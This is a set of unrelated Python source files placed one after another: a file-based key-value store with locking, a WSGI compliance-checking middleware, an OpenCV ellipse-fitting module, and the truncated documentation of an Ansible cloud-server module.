    through a temporary file in the same tree followed by ``os.rename`` so
    updates are atomic, even over NFS.
    '''
    def __init__(self, dname, compress_numpy=False):
        '''
        file_store(dname)

        Parameters
        ----------
        dname : str
            Base directory of the store (a trailing slash is stripped)
        compress_numpy : bool, optional
            If True, numpy arrays go through the generic (compressed) encoder
            instead of the raw ``.npy`` fast path (default: False)
        '''
        if dname.endswith('/'): dname = dname[:-1]
        self.jugdir = dname
        self.compress_numpy = compress_numpy

    def __repr__(self):
        return 'file_store({})'.format(self.jugdir)
    __str__ = __repr__

    def create(self):
        '''
        Recursively create directories.
        '''
        create_directories(self.jugdir)
        create_directories(self.tempdir())

    def _maybe_create(self):
        '''
        Calls self.create() the first time it is called; then becomes a no-op.
        '''
        self.create()
        # Shadow the bound method on the instance so later calls cost nothing.
        self._maybe_create = (lambda : None)

    def tempdir(self):
        # Temporary files live inside the store so the final os.rename never
        # crosses a filesystem boundary (cross-device rename is not atomic).
        return path.join(self.jugdir, 'tempfiles')

    def _getfname(self, name):
        import six
        if type(name) != six.text_type:
            name = six.text_type(name, 'utf-8')
        # Two-level layout (first two characters as a subdirectory) keeps each
        # directory small even with many keys.
        return path.join(self.jugdir, name[:2], name[2:])

    def dump(self, object, name):
        '''
        store.dump(object, name)

        Performs roughly the same as

            pickle.dump(object, open(name,'w'))

        but does it in a way that is guaranteed to be atomic even over NFS and
        using compression on the disk for faster access.
        '''
        self._maybe_create()
        name = self._getfname(name)
        create_directories(dirname(name))
        fd, fname = tempfile.mkstemp('.jugtmp', 'jugtemp', self.tempdir())
        output = os.fdopen(fd, 'wb')
        try:
            import numpy as np
            # Fast path: uncompressed numpy arrays are written in raw .npy
            # format (read back by load() via np.lib.format.read_array).
            if not self.compress_numpy and type(object) == np.ndarray:
                np.lib.format.write_array(output, object)
                output.flush()
                os.fsync(output.fileno())
                output.close()
                fsync_dir(fname)
                os.rename(fname, name)
                return
        except ImportError:
            pass
        except OSError:
            pass
        except ValueError:
            pass
        encode_to(object, output)
        output.flush()
        os.fsync(output.fileno())
        output.close()
        # Rename is atomic even over NFS.
        fsync_dir(fname)
        os.rename(fname, name)

    def list(self):
        '''
        keys = store.list()

        Returns a list of all the keys in the store
        '''
        if not exists(self.jugdir):
            return []
        keys = []
        for d in os.listdir(self.jugdir):
            # Only the two-character hash-prefix directories hold entries;
            # this naturally skips 'tempfiles' and 'locks'.
            if len(d) == 2:
                for f in os.listdir(path.join(self.jugdir, d)):
                    keys.append((d+f).encode('ascii'))
        return keys

    def listlocks(self):
        '''
        keys = store.listlocks()

        Returns a list of all the locks in the store

        This is an unsafe function as the results may be outdated by the time
        the function returns.
        '''
        if not exists(path.join(self.jugdir, 'locks')):
            return []
        keys = []
        for k in os.listdir(path.join(self.jugdir, 'locks')):
            keys.append(k[:-len('.lock')].encode('ascii'))
        return keys

    def can_load(self, name):
        '''
        can = store.can_load(name)

        Whether an entry for ``name`` exists on disk.
        '''
        fname = self._getfname(name)
        return exists(fname)

    def load(self, name):
        '''
        obj = store.load(name)

        Loads the objects. Equivalent to pickle.load(), but a bit smarter at
        times.

        Parameters
        ----------
        name : str
            Key to use

        Returns
        -------
        obj : any
            The object that was saved under ``name``
        '''
        fname = self._getfname(name)
        # Use a context manager so the file handle is not leaked (the previous
        # implementation never closed it).
        with open(fname, 'rb') as stream:
            try:
                import numpy as np
                # Mirror dump(): try the raw .npy fast path first.
                return np.lib.format.read_array(stream)
            except ValueError:
                # Not an .npy payload; rewind and use the generic decoder.
                stream.seek(0)
            except ImportError:
                pass
            return decode_from(stream)

    def remove(self, name):
        '''
        was_removed = store.remove(name)

        Remove the entry associated with name.

        Returns whether any entry was actually removed.
        '''
        try:
            fname = self._getfname(name)
            os.unlink(fname)
            return True
        except OSError:
            return False

    def cleanup(self, active, keeplocks=False):
        '''
        nr_removed = store.cleanup(active, keeplocks)

        Implement 'cleanup' command

        Parameters
        ----------
        active : sequence
            files *not to remove*
        keeplocks : boolean
            whether to preserve or remove locks

        Returns
        -------
        nr_removed : integer
            number of removed files
        '''
        active = frozenset(self._getfname(t.hash()) for t in active)
        # BUGFIX: os.walk yields full directory paths, so the previous check
        # (dir == "locks") never matched and lock files were deleted even when
        # keeplocks was True. Compare against the actual locks directory path.
        lockdir = path.join(self.jugdir, 'locks')
        removed = 0
        for dirpath, _, fs in os.walk(self.jugdir):
            if keeplocks and dirpath == lockdir:
                continue
            for f in fs:
                f = path.join(dirpath, f)
                if f not in active:
                    os.unlink(f)
                    removed += 1
        return removed

    def remove_locks(self):
        '''
        removed = store.remove_locks()

        Remove all locks

        Returns
        -------
        removed : int
            Number of locks removed
        '''
        lockdir = path.join(self.jugdir, 'locks')
        if not exists(lockdir): return 0
        removed = 0
        for f in os.listdir(lockdir):
            os.unlink(path.join(lockdir, f))
            removed += 1
        return removed

    def getlock(self, name):
        '''
        lock = store.getlock(name)

        Retrieve a lock object associated with ``name``.

        Parameters
        ----------
        name : str
            Key

        Returns
        -------
        lock : Lock object
            This is a file_lock object
        '''
        return file_based_lock(self.jugdir, name)

    def close(self):
        '''
        store.close()

        Has no effect on file based stores.
        '''
        pass

    def metadata(self, t):
        '''
        meta = store.metadata(t)

        Retrieves information on the state of the computation

        Parameters
        ----------
        t : Task
            A Task object

        Returns
        -------
        meta : dict
            Dictionary describing the state of the computation
        '''
        from os import stat, path
        from time import ctime
        fname = self._getfname(t.hash())
        if path.exists(fname):
            st = stat(fname)
            return {
                'computed': True,
                'completed': ctime(st.st_mtime),
            }
        return {
            'computed': False
        }

    @staticmethod
    def remove_store(jugdir):
        '''
        file_store.remove_store(jugdir)

        Removes from disk all the files associated with this jugdir.
        '''
        if path.exists(jugdir):
            shutil.rmtree(jugdir)
class file_based_lock(base_lock):
    '''
    File-system based lock objects.

    A lock called ``name`` is represented by the file
    ``<jugdir>/locks/<name>.lock``; its mere existence means "locked".

    - get(): acquire the lock
    - release(): release the lock
    - is_locked(): check lock state
    '''
    def __init__(self, jugdir, name):
        import six
        if type(name) is not six.text_type:
            name = six.text_type(name, 'utf-8')
        # All lock files are grouped under jugdir/locks/
        self.fullname = path.join(jugdir, 'locks', '{0}.lock'.format(name))

    def get(self):
        '''
        lock.get()

        Try to acquire the lock in an NFS-compatible way (exclusive create).

        Returns
        -------
        locked : bool
            True if this call created the lock, False otherwise
        '''
        if exists(self.fullname):
            return False
        create_directories(path.dirname(self.fullname))
        try:
            import socket
            from datetime import datetime
            # O_EXCL makes creation fail if another process won the race.
            flags = os.O_RDWR | os.O_CREAT | os.O_EXCL
            handle = os.fdopen(os.open(self.fullname, flags), 'w')
            handle.write('PID {0} on HOSTNAME {1}\n'.format(os.getpid(), socket.gethostname()))
            handle.write('Lock created on {0}\n'.format(datetime.now().strftime('%Y-%m-%d (%Hh%M.%S)')))
            handle.close()
            return True
        except OSError:
            return False

    def release(self):
        '''
        lock.release()

        Delete the lock file; a missing lock is silently ignored.
        '''
        try:
            os.unlink(self.fullname)
        except OSError:
            pass

    def is_locked(self):
        '''
        locked = lock.is_locked()

        Report whether the lock file currently exists. The answer may be
        stale by the time this function returns; only get() avoids the
        race condition.
        '''
        return path.exists(self.fullname)
| |
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# Also licensed under the Apache License, 2.0: http://opensource.org/licenses/apache2.0.php
# Licensed to PSF under a Contributor Agreement
"""
Middleware to check for obedience to the WSGI specification.
Some of the things this checks:
* Signature of the application and start_response (including that
keyword arguments are not used).
* Environment checks:
- Environment is a dictionary (and not a subclass).
- That all the required keys are in the environment: REQUEST_METHOD,
SERVER_NAME, SERVER_PORT, wsgi.version, wsgi.input, wsgi.errors,
wsgi.multithread, wsgi.multiprocess, wsgi.run_once
- That HTTP_CONTENT_TYPE and HTTP_CONTENT_LENGTH are not in the
environment (these headers should appear as CONTENT_LENGTH and
CONTENT_TYPE).
- Warns if QUERY_STRING is missing, as the cgi module acts
unpredictably in that case.
- That CGI-style variables (that don't contain a .) have
(non-unicode) string values
- That wsgi.version is a tuple
- That wsgi.url_scheme is 'http' or 'https' (@@: is this too
restrictive?)
- Warns if the REQUEST_METHOD is not known (@@: probably too
restrictive).
- That SCRIPT_NAME and PATH_INFO are empty or start with /
- That at least one of SCRIPT_NAME or PATH_INFO are set.
- That CONTENT_LENGTH is a positive integer.
- That SCRIPT_NAME is not '/' (it should be '', and PATH_INFO should
be '/').
- That wsgi.input has the methods read, readline, readlines, and
__iter__
- That wsgi.errors has the methods flush, write, writelines
* The status is a string, contains a space, starts with an integer,
and that integer is in range (> 100).
* That the headers is a list (not a subclass, not another kind of
sequence).
* That the items of the headers are tuples of strings.
* That there is no 'status' header (that is used in CGI, but not in
WSGI).
* That the headers don't contain newlines or colons, end in _ or -, or
contain characters codes below 037.
* That Content-Type is given if there is content (CGI often has a
default content type, but WSGI does not).
* That no Content-Type is given when there is no content (@@: is this
too restrictive?)
* That the exc_info argument to start_response is a tuple or None.
* That all calls to the writer are with strings, and no other methods
on the writer are accessed.
* That wsgi.input is used properly:
- .read() is called with zero or one argument
- That it returns a string
- That readline, readlines, and __iter__ return strings
- That .close() is not called
- No other methods are provided
* That wsgi.errors is used properly:
- .write() and .writelines() is called with a string
- That .close() is not called, and no other methods are provided.
* The response iterator:
- That it is not a string (it should be a list of a single string; a
string will work, but perform horribly).
- That .next() returns a string
- That the iterator is not iterated over until start_response has
been called (that can signal either a server or application
error).
- That .close() is called (doesn't raise exception, only prints to
sys.stderr, because we only know it isn't called when the object
is garbage collected).
"""
import re
import sys
from types import DictType, StringType, TupleType, ListType
import warnings
# Legal header field-name: a leading letter followed by letters, digits,
# hyphens or underscores.
header_re = re.compile(r'^[a-zA-Z][a-zA-Z0-9\-_]*$')
# Control characters (octal 000-037) are forbidden in header values.
bad_header_value_re = re.compile(r'[\000-\037]')
class WSGIWarning(Warning):
    """
    Warning category for WSGI-spec-related issues that are not outright
    violations (those raise AssertionError instead).
    """
def middleware(application, global_conf=None):
    """
    When applied between a WSGI server and a WSGI application, this
    middleware will check for WSGI compliancy on a number of levels.
    This middleware does not modify the request or response in any
    way, but will throw an AssertionError if anything seems off
    (except for a failure to close the application iterator, which
    will be printed to stderr -- there's no way to throw an exception
    at that point).
    """
    def lint_app(*args, **kw):
        # The WSGI callable contract: exactly (environ, start_response),
        # passed positionally, with no keyword arguments.
        assert len(args) == 2, "Two arguments required"
        assert not kw, "No keyword arguments allowed"
        environ, start_response = args
        check_environ(environ)
        # We use this to check if the application returns without
        # calling start_response:
        start_response_started = []
        def start_response_wrapper(*args, **kw):
            # start_response takes (status, headers[, exc_info]).
            assert len(args) == 2 or len(args) == 3, (
                "Invalid number of arguments: %s" % args)
            assert not kw, "No keyword arguments allowed"
            status = args[0]
            headers = args[1]
            if len(args) == 3:
                exc_info = args[2]
            else:
                exc_info = None
            check_status(status)
            check_headers(headers)
            check_content_type(status, headers)
            check_exc_info(exc_info)
            # Record that start_response ran, so IteratorWrapper can verify
            # the body is not iterated before it.
            start_response_started.append(None)
            return WriteWrapper(start_response(*args))
        # Wrap the streams so misuse of wsgi.input / wsgi.errors is caught.
        environ['wsgi.input'] = InputWrapper(environ['wsgi.input'])
        environ['wsgi.errors'] = ErrorWrapper(environ['wsgi.errors'])
        iterator = application(environ, start_response_wrapper)
        assert iterator is not None and iterator != False, (
            "The application must return an iterator, if only an empty list")
        check_iterator(iterator)
        return IteratorWrapper(iterator, start_response_started)
    return lint_app
class InputWrapper(object):
    """Proxy around wsgi.input that enforces the WSGI read protocol:
    native-string results, limited signatures, and no close()."""

    def __init__(self, wsgi_input):
        self.input = wsgi_input

    def read(self, *args):
        # .read() may take at most one (size) argument.
        assert len(args) <= 1
        data = self.input.read(*args)
        assert type(data) is type("")
        return data

    def readline(self, *args):
        line = self.input.readline(*args)
        assert type(line) is type("")
        return line

    def readlines(self, *args):
        assert len(args) <= 1
        result = self.input.readlines(*args)
        assert type(result) is type([])
        for entry in result:
            assert type(entry) is type("")
        return result

    def __iter__(self):
        # Delegate to readline so its type checks apply to iteration too.
        line = self.readline()
        while line:
            yield line
            line = self.readline()

    def close(self):
        assert 0, "input.close() must not be called"
class ErrorWrapper(object):
    """Proxy around wsgi.errors that enforces the WSGI error-stream
    protocol: only native strings, and no close()."""

    def __init__(self, wsgi_errors):
        self.errors = wsgi_errors

    def write(self, s):
        assert type(s) is type("")
        self.errors.write(s)

    def writelines(self, seq):
        # Funnel everything through write() so its type check applies.
        for chunk in seq:
            self.write(chunk)

    def flush(self):
        self.errors.flush()

    def close(self):
        assert 0, "errors.close() must not be called"
class WriteWrapper(object):
    """Wraps the writer returned by start_response; only native strings
    may be passed to it."""

    def __init__(self, wsgi_writer):
        self.writer = wsgi_writer

    def __call__(self, s):
        # Reject anything that is not a native string before forwarding.
        assert type(s) is type("")
        self.writer(s)
class PartialIteratorWrapper(object):
    """
    Lazily wraps a WSGI iterator: the checking IteratorWrapper is only
    created once iteration actually begins.
    """

    def __init__(self, wsgi_iterator):
        self.iterator = wsgi_iterator

    def __iter__(self):
        # We want to make sure __iter__ is called
        # Bug fix: IteratorWrapper.__init__ requires a second
        # check_start_response argument; the original call omitted it and
        # raised TypeError. Pass None to disable that check here, matching
        # upstream Paste behaviour.
        return IteratorWrapper(self.iterator, None)
class IteratorWrapper(object):
    """
    Wraps the application's response iterator, asserting that it is not
    consumed before start_response has been called, not read after
    close(), and that close() is eventually invoked.
    """

    def __init__(self, wsgi_iterator, check_start_response):
        self.original_iterator = wsgi_iterator
        self.iterator = iter(wsgi_iterator)
        self.closed = False
        # A list used as a flag: empty until start_response runs.
        # None disables the check entirely.
        self.check_start_response = check_start_response

    def __iter__(self):
        return self

    def next(self):
        assert not self.closed, (
            "Iterator read after closed")
        # Use the builtin next() so the wrapper works on both Python 2.6+
        # (where iterators expose .next()) and Python 3 (__next__).
        v = next(self.iterator)
        if self.check_start_response is not None:
            assert self.check_start_response, (
                "The application returns and we started iterating over its body, but start_response has not yet been called")
            # Only check on the first item.
            self.check_start_response = None
        return v

    # Python 3 iteration-protocol alias (backward-compatible addition).
    __next__ = next

    def close(self):
        self.closed = True
        if hasattr(self.original_iterator, 'close'):
            self.original_iterator.close()

    def __del__(self):
        # We can only detect a missing close() at garbage collection,
        # so report to stderr as well as asserting.
        if not self.closed:
            sys.stderr.write(
                "Iterator garbage collected without being closed")
        assert self.closed, (
            "Iterator garbage collected without being closed")
def check_environ(environ):
    """Assert that *environ* satisfies the WSGI environment requirements:
    a plain dict with the required keys, native-string CGI variables, and
    consistent SCRIPT_NAME / PATH_INFO / CONTENT_LENGTH values."""
    # Must be exactly dict, not a subclass (per the WSGI spec).
    assert type(environ) is DictType, (
        "Environment is not of the right type: %r (environment: %r)"
        % (type(environ), environ))
    for key in ['REQUEST_METHOD', 'SERVER_NAME', 'SERVER_PORT',
                'wsgi.version', 'wsgi.input', 'wsgi.errors',
                'wsgi.multithread', 'wsgi.multiprocess',
                'wsgi.run_once']:
        assert key in environ, (
            "Environment missing required key: %r" % key)
    # Content-Type / Content-Length must not appear with the HTTP_ prefix.
    for key in ['HTTP_CONTENT_TYPE', 'HTTP_CONTENT_LENGTH']:
        assert key not in environ, (
            "Environment should not have the key: %s "
            "(use %s instead)" % (key, key[5:]))
    if 'QUERY_STRING' not in environ:
        warnings.warn(
            'QUERY_STRING is not in the WSGI environment; the cgi '
            'module will use sys.argv when this variable is missing, '
            'so application errors are more likely',
            WSGIWarning)
    for key in environ.keys():
        if '.' in key:
            # Extension, we don't care about its type
            continue
        assert type(environ[key]) is StringType, (
            "Environmental variable %s is not a string: %r (value: %r)"
            % (key, type(environ[key]), environ[key]))
    assert type(environ['wsgi.version']) is TupleType, (
        "wsgi.version should be a tuple (%r)" % environ['wsgi.version'])
    assert environ['wsgi.url_scheme'] in ('http', 'https'), (
        "wsgi.url_scheme unknown: %r" % environ['wsgi.url_scheme'])
    # Validate the stream objects structurally (required methods present).
    check_input(environ['wsgi.input'])
    check_errors(environ['wsgi.errors'])
    # @@: these need filling out:
    if environ['REQUEST_METHOD'] not in (
        'GET', 'HEAD', 'POST', 'OPTIONS','PUT','DELETE','TRACE'):
        warnings.warn(
            "Unknown REQUEST_METHOD: %r" % environ['REQUEST_METHOD'],
            WSGIWarning)
    assert (not environ.get('SCRIPT_NAME')
            or environ['SCRIPT_NAME'].startswith('/')), (
        "SCRIPT_NAME doesn't start with /: %r" % environ['SCRIPT_NAME'])
    assert (not environ.get('PATH_INFO')
            or environ['PATH_INFO'].startswith('/')), (
        "PATH_INFO doesn't start with /: %r" % environ['PATH_INFO'])
    if environ.get('CONTENT_LENGTH'):
        assert int(environ['CONTENT_LENGTH']) >= 0, (
            "Invalid CONTENT_LENGTH: %r" % environ['CONTENT_LENGTH'])
    if not environ.get('SCRIPT_NAME'):
        # Python 2 idiom; equivalent to "'PATH_INFO' in environ".
        assert environ.has_key('PATH_INFO'), (
            "One of SCRIPT_NAME or PATH_INFO are required (PATH_INFO "
            "should at least be '/' if SCRIPT_NAME is empty)")
    assert environ.get('SCRIPT_NAME') != '/', (
        "SCRIPT_NAME cannot be '/'; it should instead be '', and "
        "PATH_INFO should be '/'")
def check_input(wsgi_input):
    """Assert that wsgi.input exposes the methods the WSGI spec requires."""
    required = ('read', 'readline', 'readlines', '__iter__')
    for attr in required:
        assert hasattr(wsgi_input, attr), (
            "wsgi.input (%r) doesn't have the attribute %s"
            % (wsgi_input, attr))
def check_errors(wsgi_errors):
    """Assert that wsgi.errors exposes the methods the WSGI spec requires."""
    required = ('flush', 'write', 'writelines')
    for attr in required:
        assert hasattr(wsgi_errors, attr), (
            "wsgi.errors (%r) doesn't have the attribute %s"
            % (wsgi_errors, attr))
def check_status(status):
    """Assert that *status* is a well-formed WSGI status string: a native
    string whose first word is a three-digit code >= 100; warn when the
    reason phrase is missing."""
    assert type(status) is StringType, (
        "Status must be a string (not %r)" % status)
    # Implicitly check that we can turn it into an integer:
    code_text = status.split(None, 1)[0]
    assert len(code_text) == 3, (
        "Status codes must be three characters: %r" % code_text)
    code = int(code_text)
    assert code >= 100, "Status code is invalid: %r" % code
    # A reason phrase is recommended rather than required: warn, don't fail.
    if len(status) < 4 or status[3] != ' ':
        warnings.warn(
            "The status string (%r) should be a three-digit integer "
            "followed by a single space and a status explanation"
            % status, WSGIWarning)
def check_headers(headers):
    """Assert that *headers* is a plain list of 2-tuples of strings forming
    WSGI-legal response headers (no Status header, no control characters,
    no trailing '-'/'_' in names)."""
    assert type(headers) is ListType, (
        "Headers (%r) must be of type list: %r"
        % (headers, type(headers)))
    header_names = {}
    for item in headers:
        assert type(item) is TupleType, (
            "Individual headers (%r) must be of type tuple: %r"
            % (item, type(item)))
        assert len(item) == 2
        name, value = item
        # 'Status' belongs to CGI; in WSGI the status is passed separately.
        assert name.lower() != 'status', (
            "The Status header cannot be used; it conflicts with CGI "
            "script, and HTTP status is not given through headers "
            "(value: %r)." % value)
        header_names[name.lower()] = None
        assert '\n' not in name and ':' not in name, (
            "Header names may not contain ':' or '\\n': %r" % name)
        assert header_re.search(name), "Bad header name: %r" % name
        assert not name.endswith('-') and not name.endswith('_'), (
            "Names may not end in '-' or '_': %r" % name)
        # Control characters in values (see bad_header_value_re) are illegal.
        assert not bad_header_value_re.search(value), (
            "Bad header value: %r (bad char: %r)"
            % (value, bad_header_value_re.search(value).group(0)))
def check_content_type(status, headers):
    """Assert that a Content-Type header is present exactly when the
    status code permits a message body."""
    code = int(status.split(None, 1)[0])
    # @@: need one more person to verify this interpretation of RFC 2616
    # http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    NO_MESSAGE_BODY = (201, 204, 304)
    has_body = code not in NO_MESSAGE_BODY
    for name, value in headers:
        if name.lower() != 'content-type':
            continue
        if has_body:
            # Body allowed and Content-Type present: all good.
            return
        assert 0, (("Content-Type header found in a %s response, "
                    "which must not return content.") % code)
    if has_body:
        assert 0, "No Content-Type header found in headers (%s)" % headers
def check_exc_info(exc_info):
    """Assert that the exc_info passed to start_response is either None
    or a tuple (as produced by sys.exc_info())."""
    valid = exc_info is None or type(exc_info) is type(())
    assert valid, (
        "exc_info (%r) is not a tuple: %r" % (exc_info, type(exc_info)))
    # More exc_info checks?
def check_iterator(iterator):
    """Reject a bare string as the application iterator.

    Technically a string is legal, but it iterates character by character,
    so the response would be pushed out one byte at a time.
    """
    assert not isinstance(iterator, str), (
        "You should not return a string as your application iterator, "
        "instead return a single-item list containing that string.")
def make_middleware(application, global_conf):
    # @@: global_conf should be taken out of the middleware function,
    # and isolated here
    # Paste filter factory entry point: global_conf is accepted to satisfy
    # the factory signature but is currently unused (see note above).
    return middleware(application)

# Reuse the module docstring so the factory is self-documenting in Paste.
make_middleware.__doc__ = __doc__

__all__ = ['middleware', 'make_middleware']
| |
#
# Milovision: A camera pose estimation programme
#
# Copyright (C) 2013 Joris Stork
# See LICENSE.txt
#
# ellipse.py
"""
:synopsis: Contains the EllipseFitter class, a PipelineModule used to fit
ellipses to the pipeline's sequences of contours.
.. moduleauthor:: Joris Stork <joris@wintermute.eu>
"""
import logging
import copy
import cv2
from pipeline_module import PipelineModule
import sys
import numpy as np
import math
class EllipseFitter(PipelineModule):
    """
    PipelineModule that fits ellipses to the pipeline's contour sequences
    and filters them down to concentric marker candidates.
    """

    def __init__(self, pipeline = None):
        """
        Sets ellipse filtering parameters and initialises accounting variables.
        """
        PipelineModule.__init__(self, pipeline = pipeline)
        self.nr_ellipses = 0.0     # running total of fitted ellipses
        self.nr_candidates = 0     # running total of accepted candidates
        self.min_contour_length = 10           # contours shorter than this are skipped
        self.max_aspect_ratio = 10.            # reject very elongated ellipses
        self.max_relative_inclination = 30.    # max inclination difference (degrees)
        self.max_ctrs_distance = 4.            # max centre-to-centre distance
        # ratio ellipse sizes (outer/inner), (negative, positive) errors
        self.max_sizes_ratio_error = [0.25, 0.50]

    def convert_representation(self, ellipses = None):
        """
        Converts ellipse attributes to the pipeline's conventions regarding
        units of measurement and the camera's coordinate basis: re-centre on
        the image midpoint, flip the y axis, scale by the camera pixel size
        and convert the inclination to radians.
        """
        # Hoisted: the camera is the same for every ellipse in the batch.
        cam = self.pipe.outputs[-1].cam
        converted = copy.deepcopy(ellipses)
        for i, ellipse in enumerate(converted):
            ((x_0, y_0), (b, a), alpha) = ellipse
            x_0 = (x_0 - cam.ipw / 2.) * cam.pixelsize
            y_0 = (cam.iph - y_0 - cam.iph / 2.) * cam.pixelsize
            a *= cam.pixelsize
            b *= cam.pixelsize
            converted[i] = ((x_0, y_0), (b, a), math.radians(alpha))
        return converted

    def ellipse_to_dict(self, ellipse):
        """ converts the OpenCV ellipse representation to a dict """
        ((x, y), (minor, major), alpha) = copy.deepcopy(ellipse)
        return {
            'minor': minor,
            'major': major,
            'ctr': np.asarray((x, y)),
            'alpha': alpha,
            'object': ellipse,  # keep the original OpenCV tuple around
        }

    def larger_smaller(self, a, b):
        """ returns a and b in the order: largest, smallest (by major axis) """
        if b['major'] > a['major']:
            return b, a
        return a, b

    def aspect_ratio(self, e):
        """ returns the aspect ratio of the given ellipse """
        return abs(e['major'] / e['minor'])

    def aspect_ratio_ok(self, e):
        """
        Tests whether aspect ratio of the given ellipse is within a
        pre-determined limit
        """
        return self.aspect_ratio(e) <= self.max_aspect_ratio

    def distance_ok(self, a, b):
        """
        Tests whether the distance between the centres of the given ellipses
        is within a pre-determined limit. nb: np.linalg.norm returns an
        absolute value.
        """
        return np.linalg.norm(a['ctr'] - b['ctr']) <= self.max_ctrs_distance

    def relative_inclination_ok(self, a, b):
        """
        Tests whether the difference between the inclinations of the two
        given ellipses is within a pre-determined limit.
        This is not used for near-circular ellipses.
        """
        return abs(a['alpha'] - b['alpha']) < self.max_relative_inclination

    def sizes_ratio_ok(self, larger = None, smaller = None):
        """
        Tests whether ratio of sizes of given ellipses is within a
        pre-determined range around the marker's known outer/inner diameter
        ratio.
        """
        marker_config = self.pipe.outputs[-1].markers[-1].config
        correct_ratio = (marker_config.outer_circle_diam * 1.) / \
            (marker_config.inner_circle_diam * 1.)
        ratio = abs(larger['major'] / smaller['major'])
        not_too_small = ratio > (correct_ratio - self.max_sizes_ratio_error[0])
        not_too_big = ratio < (correct_ratio + self.max_sizes_ratio_error[1])
        return not_too_small and not_too_big

    def both_circular(self, a, b):
        """
        Tests whether given ellipses have an aspect ratio smaller than a
        pre-determined limit.
        """
        return (self.aspect_ratio(a) < 1.2) and (self.aspect_ratio(b) < 1.2)

    def marker_filter(self, ellipses = None):
        """
        Compares every ellipse (a) with every other (b), and returns the
        larger member of each pair that passes the aspect ratio, distance,
        inclination and size-ratio tests.
        """
        # Note: the unused `conditions` accumulators from the original
        # implementation were dead code and have been removed.
        candidates = []
        for i in xrange(len(ellipses)):
            a = self.ellipse_to_dict(ellipses[i])
            if not self.aspect_ratio_ok(a):
                continue
            for j in xrange(i + 1, len(ellipses)):
                b = self.ellipse_to_dict(ellipses[j])
                larger, smaller = self.larger_smaller(a, b)
                if not self.aspect_ratio_ok(b):
                    continue
                if not self.distance_ok(a, b):
                    continue
                # Inclination is unreliable for near-circular ellipses, so
                # only compare it when at least one is clearly elongated.
                if not self.both_circular(a, b):
                    if not self.relative_inclination_ok(a, b):
                        continue
                if not self.sizes_ratio_ok(larger, smaller):
                    continue
                if larger['object'] not in candidates:
                    candidates.append(larger['object'])
        return candidates

    def run(self):
        """
        The main function. Rejects contours below a pre-determined length;
        filters the remainder; converts the remaining ellipses to the
        pipeline's representational convention; and draws these ellipses
        over the current camera image in an OpenCV window before saving
        them to the pipeline.
        """
        ellipses = []
        if self.pipe.modules[0].__class__.__name__ == 'ContourFinder':
            for cont in self.pipe.modules[0].conts:
                if len(cont) < self.min_contour_length:
                    continue
                ellipses.append(cv2.fitEllipse(cont))
            self.nr_ellipses += len(ellipses)
        else:
            self.logger.error('no ContourFinder in pipeline')
            # NOTE(review): execution continues past shutdown(); presumably
            # shutdown() stops the pipeline asynchronously -- confirm.
            self.pipe.shutdown()
        candidates = self.marker_filter(ellipses)
        self.nr_candidates += len(candidates)
        converted_candidates = self.convert_representation(ellipses=candidates)
        self.pipe.ellipses = []
        for conv_candidate, candidate in zip(converted_candidates, candidates):
            cv2.ellipse(
                img = self.pipe.canv,
                box = candidate,
                color = (255, 255, 255),
                thickness = 2,
                lineType = cv2.CV_AA  # antialiased
            )
            self.pipe.ellipses.append(conv_candidate)
| |
#!/usr/bin/python
#
# Copyright (c) 2015 CenturyLink
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
# Standard Ansible module metadata: 'preview' maturity, community supported.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}
DOCUMENTATION = '''
module: clc_server
short_description: Create, Delete, Start and Stop servers in CenturyLink Cloud.
description:
- An Ansible module to Create, Delete, Start and Stop servers in CenturyLink Cloud.
version_added: "2.0"
options:
additional_disks:
description:
- The list of additional disks for the server
required: False
default: []
add_public_ip:
description:
- Whether to add a public ip to the server
required: False
default: False
choices: [False, True]
alias:
description:
- The account alias to provision the servers under.
required: False
default: None
anti_affinity_policy_id:
description:
- The anti-affinity policy to assign to the server. This is mutually exclusive with 'anti_affinity_policy_name'.
required: False
default: None
anti_affinity_policy_name:
description:
- The anti-affinity policy to assign to the server. This is mutually exclusive with 'anti_affinity_policy_id'.
required: False
default: None
alert_policy_id:
description:
- The alert policy to assign to the server. This is mutually exclusive with 'alert_policy_name'.
required: False
default: None
alert_policy_name:
description:
- The alert policy to assign to the server. This is mutually exclusive with 'alert_policy_id'.
required: False
default: None
count:
description:
- The number of servers to build (mutually exclusive with exact_count)
required: False
default: 1
count_group:
description:
      - Required when exact_count is specified. The Server Group used to determine how many servers to deploy.
required: False
default: None
cpu:
description:
- How many CPUs to provision on the server
default: 1
required: False
cpu_autoscale_policy_id:
description:
- The autoscale policy to assign to the server.
default: None
required: False
custom_fields:
description:
- The list of custom fields to set on the server.
default: []
required: False
description:
description:
- The description to set for the server.
default: None
required: False
exact_count:
description:
      - Run in idempotent mode. Will ensure that this exact number of servers are running in the provided group,
creating and deleting them to reach that count. Requires count_group to be set.
default: None
required: False
group:
description:
- The Server Group to create servers under.
default: 'Default Group'
required: False
ip_address:
description:
- The IP Address for the server. One is assigned if not provided.
default: None
required: False
location:
description:
- The Datacenter to create servers in.
default: None
required: False
managed_os:
description:
- Whether to create the server as 'Managed' or not.
default: False
required: False
choices: [True, False]
memory:
description:
- Memory in GB.
default: 1
required: False
name:
description:
- A 1 to 6 character identifier to use for the server. This is required when state is 'present'
default: None
required: False
network_id:
description:
- The network UUID on which to create servers.
default: None
required: False
packages:
description:
      - The list of blueprint packages to run on the server after it is created.
default: []
required: False
password:
description:
- Password for the administrator / root user
default: None
required: False
primary_dns:
description:
- Primary DNS used by the server.
default: None
required: False
public_ip_protocol:
description:
- The protocol to use for the public ip if add_public_ip is set to True.
default: 'TCP'
choices: ['TCP', 'UDP', 'ICMP']
required: False
public_ip_ports:
description:
- A list of ports to allow on the firewall to the servers public ip, if add_public_ip is set to True.
default: []
required: False
secondary_dns:
description:
- Secondary DNS used by the server.
default: None
required: False
server_ids:
description:
      - Required for started, stopped, and absent states.
        A list of server Ids to ensure are started, stopped, or absent.
default: []
required: False
source_server_password:
description:
- The password for the source server if a clone is specified.
default: None
required: False
state:
description:
      - The state to ensure that the provided resources are in.
default: 'present'
required: False
choices: ['present', 'absent', 'started', 'stopped']
storage_type:
description:
- The type of storage to attach to the server.
default: 'standard'
required: False
choices: ['standard', 'hyperscale']
template:
description:
